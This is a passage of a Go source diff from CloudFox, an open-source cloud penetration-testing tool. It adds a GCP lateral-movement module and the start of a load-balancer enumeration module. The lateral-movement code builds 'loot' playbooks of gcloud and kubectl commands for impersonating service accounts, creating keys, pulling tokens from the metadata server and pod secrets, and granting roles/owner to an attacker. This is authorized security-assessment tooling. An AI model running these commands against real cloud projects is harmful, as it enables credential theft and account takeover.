orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + m.FoxMapperCache = gcpinternal.TryLoadFoxMapper(orgID, m.ProjectIDs) + } + + // Process each project for actual token theft vectors + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_LATERALMOVEMENT_MODULE_NAME, m.processProject) + + // Consolidate project paths + for _, paths := range m.ProjectPaths { + m.AllPaths = append(m.AllPaths, paths...) + } + + // Analyze permission-based lateral movement using FoxMapper + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Analyzing permission-based lateral movement using FoxMapper...", GCP_LATERALMOVEMENT_MODULE_NAME) + svc := m.FoxMapperCache.GetService() + allFindings := svc.AnalyzeLateral("") + + // Filter findings to only include principals from specified projects + m.FoxMapperFindings = m.filterFindingsByProjects(allFindings) + + if len(m.FoxMapperFindings) > 0 { + logger.InfoM(fmt.Sprintf("Found %d permission-based lateral movement techniques", len(m.FoxMapperFindings)), GCP_LATERALMOVEMENT_MODULE_NAME) + } + } else { + logger.InfoM("No FoxMapper data found - skipping permission-based analysis. Run 'foxmapper gcp graph create' for full analysis.", GCP_LATERALMOVEMENT_MODULE_NAME) + } + + // Check results + hasResults := len(m.AllPaths) > 0 || len(m.FoxMapperFindings) > 0 + + if !hasResults { + logger.InfoM("No lateral movement paths found", GCP_LATERALMOVEMENT_MODULE_NAME) + return + } + + // Count by category for summary + categoryCounts := make(map[string]int) + for _, path := range m.AllPaths { + categoryCounts[path.Category]++ + } + + logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s) from enumeration", len(m.AllPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) + if len(m.FoxMapperFindings) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d permission-based lateral movement technique(s)", len(m.FoxMapperFindings)), GCP_LATERALMOVEMENT_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// filterFindingsByProjects filters FoxMapper findings to only include principals +// from the specified projects (via -p or -l flags) OR principals without a clear project +func (m *LateralMovementModule) filterFindingsByProjects(findings []foxmapperservice.LateralFinding) []foxmapperservice.LateralFinding { + // Build a set of specified project IDs for fast lookup + specifiedProjects := make(map[string]bool) + for _, projectID := range m.ProjectIDs { + specifiedProjects[projectID] = true + } + + var filtered []foxmapperservice.LateralFinding + + for _, finding := range findings { + var filteredPrincipals []foxmapperservice.PrincipalAccess + for _, p := range finding.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + // Include if: SA from specified project OR user/group (no project) + if specifiedProjects[principalProject] || principalProject == "" { + filteredPrincipals = append(filteredPrincipals, p) + } + } + + if len(filteredPrincipals) > 0 { + filteredFinding := finding + filteredFinding.Principals = filteredPrincipals + filtered = append(filtered, filteredFinding) + } + } + + return filtered +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LateralMovementModule) initializeLootForProject(projectID string) { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["lateral-movement-commands"] = &internal.LootFile{ + Name: "lateral-movement-commands", + Contents: "# Lateral Movement Exploit Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } +} + +// getLateralExploitCommand returns specific exploitation commands for a lateral movement permission +func getLateralExploitCommand(permission, principal, project string) string { + commands := map[string]string{ + // Service Account Impersonation + "iam.serviceAccounts.getAccessToken": "gcloud auth print-access-token --impersonate-service-account=TARGET_SA", + "iam.serviceAccountKeys.create": "gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA", + "iam.serviceAccounts.signBlob": "gcloud iam service-accounts sign-blob --iam-account=TARGET_SA input.txt output.sig", + "iam.serviceAccounts.signJwt": "# Sign JWT to impersonate SA\ngcloud iam service-accounts sign-jwt --iam-account=TARGET_SA claim.json signed.jwt", + "iam.serviceAccounts.getOpenIdToken": "gcloud auth print-identity-token --impersonate-service-account=TARGET_SA", + "iam.serviceAccounts.actAs": "# actAs allows deploying resources with this SA\ngcloud run deploy SERVICE --service-account=TARGET_SA", + + // Compute Access + "compute.instances.osLogin": "gcloud compute ssh INSTANCE --zone=ZONE --project=PROJECT", + "compute.instances.setMetadata": "gcloud compute instances add-metadata INSTANCE --zone=ZONE --metadata=ssh-keys=\"user:$(cat ~/.ssh/id_rsa.pub)\"", + "compute.projects.setCommonInstanceMetadata": "gcloud compute project-info add-metadata --metadata=ssh-keys=\"user:$(cat ~/.ssh/id_rsa.pub)\"", + "compute.instances.getSerialPortOutput": "gcloud compute instances get-serial-port-output INSTANCE --zone=ZONE", + + // GKE Access + "container.clusters.getCredentials": "gcloud container clusters get-credentials CLUSTER --zone=ZONE --project=PROJECT", + "container.pods.exec": "kubectl exec -it POD -- /bin/sh", + "container.pods.attach": "kubectl attach -it POD", + + // Serverless + "cloudfunctions.functions.create": "gcloud functions deploy FUNC --runtime=python311 --service-account=TARGET_SA --trigger-http", + "cloudfunctions.functions.update": "gcloud functions deploy FUNC --service-account=TARGET_SA", + "run.services.create": "gcloud run deploy SERVICE --image=IMAGE --service-account=TARGET_SA", + "run.services.update": "gcloud run services update SERVICE --service-account=TARGET_SA", + + // IAM Policy Modification + "resourcemanager.projects.setIamPolicy": "gcloud projects add-iam-policy-binding PROJECT --member=user:ATTACKER --role=roles/owner", + "resourcemanager.folders.setIamPolicy": "gcloud resource-manager folders add-iam-policy-binding FOLDER_ID --member=user:ATTACKER --role=roles/owner", + "resourcemanager.organizations.setIamPolicy": "gcloud organizations add-iam-policy-binding ORG_ID --member=user:ATTACKER --role=roles/owner", + } + + cmd, ok := commands[permission] + if !ok { + return fmt.Sprintf("# No specific command for %s - check gcloud documentation", permission) + } + + if project != "" && project != "-" { + cmd = strings.ReplaceAll(cmd, "PROJECT", project) + } + + return cmd +} + +// generatePlaybookForProject generates a loot file specific to a project +func (m *LateralMovementModule) generatePlaybookForProject(projectID string) *internal.LootFile { + var sb strings.Builder + sb.WriteString("# GCP Lateral Movement Commands\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + sb.WriteString("# Generated by CloudFox\n") + sb.WriteString("# WARNING: Only use with proper authorization\n\n") + + // Token theft vectors for this project + if paths, ok := m.ProjectPaths[projectID]; ok && len(paths) > 0 { + sb.WriteString("# === TOKEN THEFT VECTORS ===\n\n") + + for _, path := range paths { + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s -> %s\n"+ + "# =============================================================================\n", path.Source, path.Target)) + sb.WriteString(fmt.Sprintf("# Method: %s\n", path.Method)) + sb.WriteString(fmt.Sprintf("# Category: %s\n", path.Category)) + if path.ExploitCommand != "" { + sb.WriteString(path.ExploitCommand) + sb.WriteString("\n\n") + } + } + } + + // Permission-based findings - filter to this project's principals + users/groups + if len(m.FoxMapperFindings) > 0 { + hasFindings := false + + for _, finding := range m.FoxMapperFindings { + var relevantPrincipals []foxmapperservice.PrincipalAccess + + for _, p := range finding.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + if principalProject == projectID || principalProject == "" { + relevantPrincipals = append(relevantPrincipals, p) + } + } + + if len(relevantPrincipals) == 0 { + continue + } + + if !hasFindings { + sb.WriteString("# === PERMISSION-BASED LATERAL MOVEMENT ===\n\n") + hasFindings = true + } + + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s (%s)\n"+ + "# =============================================================================\n", finding.Permission, finding.Category)) + sb.WriteString(fmt.Sprintf("# %s\n\n", finding.Description)) + + for _, p := range relevantPrincipals { + project := extractProjectFromPrincipal(p.Principal, m.OrgCache) + if project == "" { + project = projectID + } + + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + sb.WriteString(fmt.Sprintf("# %s (%s)\n", p.Principal, principalType)) + + if p.IsServiceAccount { + sb.WriteString(fmt.Sprintf("# Impersonate first:\ngcloud config set auth/impersonate_service_account %s\n\n", p.Principal)) + } + + cmd := getLateralExploitCommand(finding.Permission, p.Principal, project) + sb.WriteString(cmd) + sb.WriteString("\n\n") + + if p.IsServiceAccount { + sb.WriteString("# Reset impersonation when done:\n# gcloud config unset auth/impersonate_service_account\n\n") + } + } + } + } + + contents := sb.String() + if contents == fmt.Sprintf("# GCP Lateral Movement Commands\n# Project: %s\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", projectID) { + return nil + } + + return &internal.LootFile{ + Name: "lateral-movement-commands", + Contents: contents, + } +} + +func (m *LateralMovementModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing lateral movement paths in project: %s", projectID), GCP_LATERALMOVEMENT_MODULE_NAME) + } + + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + + // 1. Find impersonation chains + m.findImpersonationChains(ctx, projectID, logger) + + // 2. Find token theft vectors (compute instances, functions, etc.) + m.findTokenTheftVectors(ctx, projectID, logger) +} + +// findImpersonationChains finds service account impersonation paths +func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, projectID string, logger internal.Logger) { + iamService := IAMService.New() + + // Get all service accounts (without keys - not needed for impersonation analysis) + serviceAccounts, err := iamService.ServiceAccountsBasic(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get service accounts in project %s", projectID)) + return + } + + // For each SA, check who can impersonate it + for _, sa := range serviceAccounts { + impersonationInfo, err := iamService.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + continue + } + + // Token creators can impersonate + for _, creator := range impersonationInfo.TokenCreators { + if shared.IsPublicPrincipal(creator) { + continue + } + + riskLevel := "HIGH" + if impersonationInfo.RiskLevel == "CRITICAL" { + riskLevel = "CRITICAL" + } + + path := LateralMovementPath{ + Source: creator, + SourceType: shared.GetPrincipalType(creator), + Target: sa.Email, + Method: "Impersonate (Get Token)", + Category: "Service Account Impersonation", + Permissions: []string{"iam.serviceAccounts.getAccessToken"}, + Description: fmt.Sprintf("%s can impersonate %s", creator, sa.Email), + RiskLevel: riskLevel, + ExploitCommand: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", sa.Email), + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) + m.mu.Unlock() + } + + // Key creators can create persistent access + for _, creator := range impersonationInfo.KeyCreators { + if shared.IsPublicPrincipal(creator) { + continue + } + + path := LateralMovementPath{ + Source: creator, + SourceType: shared.GetPrincipalType(creator), + Target: sa.Email, + Method: "Create Key", + Category: "Service Account Key Creation", + Permissions: []string{"iam.serviceAccountKeys.create"}, + Description: fmt.Sprintf("%s can create keys for %s", creator, sa.Email), + RiskLevel: "CRITICAL", + ExploitCommand: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", sa.Email), + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) + m.mu.Unlock() + } + } +} + +// findTokenTheftVectors finds compute resources where tokens can be stolen +func (m *LateralMovementModule) findTokenTheftVectors(ctx context.Context, projectID string, logger internal.Logger) { + // Find Compute Engine instances with service accounts + m.findComputeInstanceVectors(ctx, projectID, logger) + + // Find Cloud Functions with service accounts + m.findCloudFunctionVectors(ctx, projectID, logger) + + // Find Cloud Run services with service accounts + m.findCloudRunVectors(ctx, projectID, logger) + + // Find GKE clusters with node service accounts + m.findGKEVectors(ctx, projectID, logger) +} + +// findComputeInstanceVectors finds compute instances where tokens can be stolen via metadata server +func (m *LateralMovementModule) findComputeInstanceVectors(ctx context.Context, projectID string, logger internal.Logger) { + computeService := ComputeEngineService.New() + + instances, err := computeService.Instances(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get compute instances in project %s", projectID)) + } + return + } + + for _, instance := range instances { + if len(instance.ServiceAccounts) == 0 { + continue + } + + for _, sa := range instance.ServiceAccounts { + if sa.Email == "" { + continue + } + + path := LateralMovementPath{ + Source: instance.Name, + SourceType: "compute_instance", + Target: sa.Email, + Method: "Steal Token (Metadata)", + Category: "Compute Instance Token Theft", + Permissions: []string{"compute.instances.get", "compute.instances.osLogin"}, + Description: fmt.Sprintf("Access to instance %s allows stealing token for %s", instance.Name, sa.Email), + RiskLevel: "HIGH", + ExploitCommand: fmt.Sprintf(`# SSH into instance and steal token +gcloud compute ssh %s --zone=%s --project=%s --command='curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"'`, + instance.Name, instance.Zone, projectID), + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) + m.mu.Unlock() + } + } +} + +// findCloudFunctionVectors finds Cloud Functions where tokens can be stolen +func (m *LateralMovementModule) findCloudFunctionVectors(ctx context.Context, projectID string, logger internal.Logger) { + functionsService := FunctionsService.New() + + functions, err := functionsService.Functions(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get Cloud Functions in project %s", projectID)) + } + return + } + + for _, fn := range functions { + if fn.ServiceAccount == "" { + continue + } + + exploitCmd := fmt.Sprintf(`# Deploy function with target SA to steal token +# Requires: cloudfunctions.functions.create + iam.serviceAccounts.actAs +gcloud functions deploy token-theft-poc \ + --gen2 --runtime=python311 --region=%s \ + --entry-point=steal_token --trigger-http --allow-unauthenticated \ + --service-account=%s --project=%s`, + fn.Region, fn.ServiceAccount, projectID) + + path := LateralMovementPath{ + Source: fn.Name, + SourceType: "cloud_function", + Target: fn.ServiceAccount, + Method: "Steal Token (Function)", + Category: "Cloud Function Token Theft", + Permissions: []string{"cloudfunctions.functions.create", "iam.serviceAccounts.actAs"}, + Description: fmt.Sprintf("Cloud Function %s runs with SA %s", fn.Name, fn.ServiceAccount), + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) + m.mu.Unlock() + } +} + +// findCloudRunVectors finds Cloud Run services where tokens can be stolen +func (m *LateralMovementModule) findCloudRunVectors(ctx context.Context, projectID string, logger internal.Logger) { + cloudRunService := CloudRunService.New() + + services, err := cloudRunService.Services(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get Cloud Run services in project %s", projectID)) + } + return + } + + for _, svc := range services { + if svc.ServiceAccount == "" { + continue + } + + exploitCmd := fmt.Sprintf(`# Deploy Cloud Run service with target SA to steal token +# Requires: run.services.create + iam.serviceAccounts.actAs +gcloud run deploy token-theft-poc \ + --image gcr.io/%s/token-theft-poc \ + --region=%s --service-account=%s \ + --allow-unauthenticated --project=%s`, + projectID, svc.Region, svc.ServiceAccount, projectID) + + path := LateralMovementPath{ + Source: svc.Name, + SourceType: "cloud_run", + Target: svc.ServiceAccount, + Method: "Steal Token (Container)", + Category: "Cloud Run Token Theft", + Permissions: []string{"run.services.create", "iam.serviceAccounts.actAs"}, + Description: fmt.Sprintf("Cloud Run service %s runs with SA %s", svc.Name, svc.ServiceAccount), + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) + m.mu.Unlock() + } +} + +// findGKEVectors finds GKE clusters/node pools where tokens can be stolen +func (m *LateralMovementModule) findGKEVectors(ctx context.Context, projectID string, logger internal.Logger) { + gkeService := GKEService.New() + + clusters, nodePools, err := gkeService.Clusters(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get GKE clusters in project %s", projectID)) + } + return + } + + // Track cluster SAs to avoid duplicates in node pools + clusterSAs := make(map[string]string) + + for _, cluster := range clusters { + if cluster.NodeServiceAccount != "" { + clusterSAs[cluster.Name] = cluster.NodeServiceAccount + + var exploitCmd string + if cluster.WorkloadIdentity != "" { + exploitCmd = fmt.Sprintf(`# Cluster uses Workload Identity - tokens are pod-specific +gcloud container clusters get-credentials %s --location=%s --project=%s +kubectl exec -it -- cat /var/run/secrets/kubernetes.io/serviceaccount/token`, + cluster.Name, cluster.Location, projectID) + } else { + exploitCmd = fmt.Sprintf(`# Cluster uses node SA - all pods can access node SA +gcloud container clusters get-credentials %s --location=%s --project=%s +kubectl exec -it -- curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"`, + cluster.Name, cluster.Location, projectID) + } + + path := LateralMovementPath{ + Source: cluster.Name, + SourceType: "gke_cluster", + Target: cluster.NodeServiceAccount, + Method: "Steal Token (Pod)", + Category: "GKE Cluster Token Theft", + Permissions: []string{"container.clusters.getCredentials", "container.pods.exec"}, + Description: fmt.Sprintf("GKE cluster %s uses node SA %s", cluster.Name, cluster.NodeServiceAccount), + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) + m.mu.Unlock() + } + } + + // Process node pools with different SAs than their cluster + for _, np := range nodePools { + clusterSA := clusterSAs[np.ClusterName] + if np.ServiceAccount == "" || np.ServiceAccount == clusterSA { + continue + } + + exploitCmd := fmt.Sprintf(`# Node pool %s uses specific SA +gcloud container clusters get-credentials %s --location=%s --project=%s +# Exec into pod running on this node pool and steal token`, + np.Name, np.ClusterName, np.Location, projectID) + + path := LateralMovementPath{ + Source: fmt.Sprintf("%s/%s", np.ClusterName, np.Name), + SourceType: "gke_nodepool", + Target: np.ServiceAccount, + Method: "Steal Token (Pod)", + Category: "GKE Node Pool Token Theft", + Permissions: []string{"container.clusters.getCredentials", "container.pods.exec"}, + Description: fmt.Sprintf("GKE node pool %s/%s uses SA %s", np.ClusterName, np.Name, np.ServiceAccount), + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) + m.mu.Unlock() + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *LateralMovementModule) addPathToLoot(path LateralMovementPath, projectID string) { + lootFile := m.LootMap[projectID]["lateral-movement-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# %s -> %s\n"+ + "# =============================================================================\n"+ + "# Method: %s\n"+ + "# Category: %s\n"+ + "# Source: %s (%s)\n"+ + "# Target: %s\n"+ + "# Permissions: %s\n"+ + "%s\n\n", + path.Source, path.Target, + path.Method, + path.Category, + path.Source, path.SourceType, + path.Target, + strings.Join(path.Permissions, ", "), + path.ExploitCommand, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *LateralMovementModule) getHeader() []string { + return []string{ + "Project", + "Source", + "Source Type", + "Target", + "Method", + "Category", + "Risk Level", + } +} + +func (m *LateralMovementModule) getFoxMapperHeader() []string { + return []string{ + "Scope Type", + "Scope ID", + "Principal Type", + "Principal", + "Category", + "Permission", + "Description", + } +} + +func (m *LateralMovementModule) pathsToTableBody(paths []LateralMovementPath) [][]string { + var body [][]string + for _, path := range paths { + body = append(body, []string{ + m.GetProjectName(path.ProjectID), + path.Source, + path.SourceType, + path.Target, + path.Method, + path.Category, + path.RiskLevel, + }) + } + return body +} + +// foxMapperFindingsForProject returns findings for a specific project +// Includes: SAs from that project + users/groups (which can access any project) +// Also filters by scope: only org/folder/project findings in the project's hierarchy +func (m *LateralMovementModule) foxMapperFindingsForProject(projectID string) [][]string { + var body [][]string + + // Get ancestor folders and org for filtering + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + } + ancestorFolderSet := make(map[string]bool) + for _, f := range ancestorFolders { + ancestorFolderSet[f] = true + } + + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + + // Include if: SA from this project OR user/group (no project) + if principalProject != projectID && principalProject != "" { + continue + } + + // Filter by scope hierarchy + if !m.scopeMatchesProject(p.ScopeType, p.ScopeID, projectID, projectOrgID, ancestorFolderSet) { + continue + } + + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + scopeID := p.ScopeID + if scopeID == "" { + scopeID = "-" + } + + body = append(body, []string{ + scopeType, + scopeID, + principalType, + p.Principal, + f.Category, + f.Permission, + f.Description, + }) + } + } + return body +} + +// foxMapperFindingsToTableBody returns all findings (for flat output) +func (m *LateralMovementModule) foxMapperFindingsToTableBody() [][]string { + var body [][]string + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + scopeID := p.ScopeID + if scopeID == "" { + scopeID = "-" + } + + body = append(body, []string{ + scopeType, + scopeID, + principalType, + p.Principal, + f.Category, + f.Permission, + f.Description, + }) + } + } + return body +} + +func (m *LateralMovementModule) buildTablesForProject(projectID string) []internal.TableFile { + // No longer outputting the old lateral-movement table + // All findings are now in lateral-movement-permissions + return []internal.TableFile{} +} + +// scopeMatchesProject checks if a scope (org/folder/project) is in the hierarchy for a project +func (m *LateralMovementModule) scopeMatchesProject(scopeType, scopeID, projectID, projectOrgID string, ancestorFolderSet map[string]bool) bool { + if scopeType == "" || scopeID == "" { + // No scope info - include by default + return true + } + + switch scopeType { + case "project": + return scopeID == projectID + case "organization": + if projectOrgID != "" { + return scopeID == projectOrgID + } + // No org info - include by default + return true + case "folder": + if len(ancestorFolderSet) > 0 { + return ancestorFolderSet[scopeID] + } + // No folder info - include by default + return true + case "resource": + // Resource-level - include by default + return true + default: + return true + } +} + +func (m *LateralMovementModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + FolderLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Process each specified project + for _, projectID := range m.ProjectIDs { + var tableFiles []internal.TableFile + + // Add FoxMapper findings table for this project (the only table now) + foxMapperBody := m.foxMapperFindingsForProject(projectID) + if len(foxMapperBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "lateral-movement-permissions", + Header: m.getFoxMapperHeader(), + Body: foxMapperBody, + }) + } + + // Add project-specific playbook (only one loot file per project) + var lootFiles []internal.LootFile + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil && playbook.Contents != "" { + lootFiles = append(lootFiles, *playbook) + } + + // Always add all specified projects to output + outputData.ProjectLevelData[projectID] = LateralMovementOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) + } +} + +func (m *LateralMovementModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := []internal.TableFile{} + + // Only output the permissions table (not the old lateral-movement table) + if len(m.FoxMapperFindings) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lateral-movement-permissions", + Header: m.getFoxMapperHeader(), + Body: m.foxMapperFindingsToTableBody(), + }) + } + + // Add per-project playbooks + var lootFiles []internal.LootFile + for _, projectID := range m.ProjectIDs { + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil && playbook.Contents != "" { + playbook.Name = fmt.Sprintf("lateral-movement-commands-%s", projectID) + lootFiles = append(lootFiles, *playbook) + } + } + + output := LateralMovementOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go new file mode 100755 index 00000000..1de55423 --- /dev/null +++ b/gcp/commands/loadbalancers.go @@ -0,0 +1,514 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/gcp/shared" + + diagramservice "github.com/BishopFox/cloudfox/gcp/services/diagramService" + loadbalancerservice "github.com/BishopFox/cloudfox/gcp/services/loadbalancerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPLoadBalancersCommand = &cobra.Command{ + Use: globals.GCP_LOADBALANCERS_MODULE_NAME, + Aliases: []string{"lb", "lbs"}, + Short: "Enumerate Load Balancers", + Long: `Enumerate Load Balancers and related configurations. + +Features: +- Lists all forwarding rules (global and regional) +- Shows backend services and health checks +- Analyzes SSL policies for weak configurations +- Identifies external vs internal load balancers +- Checks for Cloud Armor security policies`, + Run: runGCPLoadBalancersCommand, +} + +type LoadBalancersModule struct { + gcpinternal.BaseGCPModule + ProjectLoadBalancers map[string][]loadbalancerservice.LoadBalancerInfo // projectID -> load balancers + ProjectSSLPolicies map[string][]loadbalancerservice.SSLPolicyInfo // projectID -> SSL policies + ProjectBackendServices map[string][]loadbalancerservice.BackendServiceInfo // projectID -> backend services + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type LoadBalancersOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LoadBalancersOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LoadBalancersOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPLoadBalancersCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOADBALANCERS_MODULE_NAME) + if err != nil { + return + } + + module := &LoadBalancersModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectLoadBalancers: make(map[string][]loadbalancerservice.LoadBalancerInfo), + ProjectSSLPolicies: make(map[string][]loadbalancerservice.SSLPolicyInfo), + ProjectBackendServices: make(map[string][]loadbalancerservice.BackendServiceInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *LoadBalancersModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOADBALANCERS_MODULE_NAME, m.processProject) + + allLoadBalancers := m.getAllLoadBalancers() + allSSLPolicies := m.getAllSSLPolicies() + allBackendServices := m.getAllBackendServices() + + if len(allLoadBalancers) == 0 { + logger.InfoM("No load balancers found", globals.GCP_LOADBALANCERS_MODULE_NAME) + return + } + + externalCount := 0 + for _, lb := range allLoadBalancers { + if lb.Scheme == "EXTERNAL" { + externalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d load balancer(s) (%d external), %d SSL policies, %d backend services", + len(allLoadBalancers), externalCount, len(allSSLPolicies), len(allBackendServices)), globals.GCP_LOADBALANCERS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *LoadBalancersModule) getAllLoadBalancers() []loadbalancerservice.LoadBalancerInfo { + var all []loadbalancerservice.LoadBalancerInfo + for _, lbs := range m.ProjectLoadBalancers { + all = append(all, lbs...) + } + return all +} + +func (m *LoadBalancersModule) getAllSSLPolicies() []loadbalancerservice.SSLPolicyInfo { + var all []loadbalancerservice.SSLPolicyInfo + for _, policies := range m.ProjectSSLPolicies { + all = append(all, policies...) + } + return all +} + +func (m *LoadBalancersModule) getAllBackendServices() []loadbalancerservice.BackendServiceInfo { + var all []loadbalancerservice.BackendServiceInfo + for _, services := range m.ProjectBackendServices { + all = append(all, services...) + } + return all +} + +func (m *LoadBalancersModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating load balancers in project: %s", 